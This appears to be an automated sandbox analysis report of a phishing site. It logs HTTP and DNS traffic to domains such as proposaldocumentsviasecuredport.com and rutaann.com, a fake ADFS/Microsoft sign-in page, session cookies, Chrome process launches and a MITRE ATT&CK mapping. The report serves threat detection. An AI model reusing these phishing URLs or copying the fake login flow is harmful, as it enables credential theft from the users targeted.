Source: global traffic	HTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1Host: rutaann.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj\|2025-03-25T20:29:54.636Z; ai_session=mqSRh\|1742934594637.7\|1742934594637.7
Source: global traffic	HTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj\|2025-03-25T20:29:54.636Z; ai_session=mqSRh\|1742934594637.7\|1742934594637.7
Source: global traffic	HTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: proposaldocumentsviasecuredport.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: sso.ninerscorretora.com.br
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: rutaann.com
Source: global traffic	DNS traffic detected: DNS query: dc.services.visualstudio.com

Source: unknown

HTTP traffic detected: POST /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-aliveContent-Length: 22sec-ch-ua-platform: "Windows"X-Requested-TimeStamp-Combination: X-Requested-TimeStamp: X-Requested-Type-Combination: GETsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0jOTHbG-PGUIL0SGVl0fMm1ogiY0: 44282349X-Requested-with: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-Requested-Type: GETContent-type: application/x-www-form-urlencodedX-Requested-TimeStamp-Expire: Accept: */*Origin: https://proposaldocumentsviasecuredport.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 20:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 103391Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9261290ee8636a52-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=111530&min_rtt=105779&rtt_var=30964&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1640&delivery_rate=30231&cwnd=247&unsent_bytes=0&cid=124af88d4635b1c1&ts=285&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 507d20bb-5a36-4645-9fd1-8bd2f4613b00x-ms-ests-server: 2.1.20329.5 - WEULR1 ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-Dj4gipNEiZPC66EG2Uq7Cw' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Tue, 25 Mar 2025 20:29:49 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Source: chromecache_80.2.dr	String found in binary or memory: http://knockoutjs.com/
Source: chromecache_80.2.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_80.2.dr	String found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: chromecache_74.2.dr	String found in binary or memory: https://sso.ninerscorretora.com.br/?mjalaytm&email=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.192.251:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49802 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir1132_31458539

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir1132_31458539

Jump to behavior

Source: classification engine

Classification label: mal56.phis.win@25/34@26/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

